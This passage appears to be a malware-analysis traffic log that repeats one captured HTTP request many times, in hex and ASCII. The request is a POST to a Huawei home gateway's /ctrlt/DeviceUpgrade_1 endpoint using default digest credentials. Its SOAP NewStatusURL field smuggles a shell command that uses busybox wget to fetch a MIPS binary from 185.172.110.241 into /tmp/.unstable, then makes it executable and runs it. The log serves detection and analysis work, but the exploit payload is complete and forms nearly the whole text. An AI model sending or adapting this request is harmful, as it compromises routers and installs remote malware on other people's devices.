52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 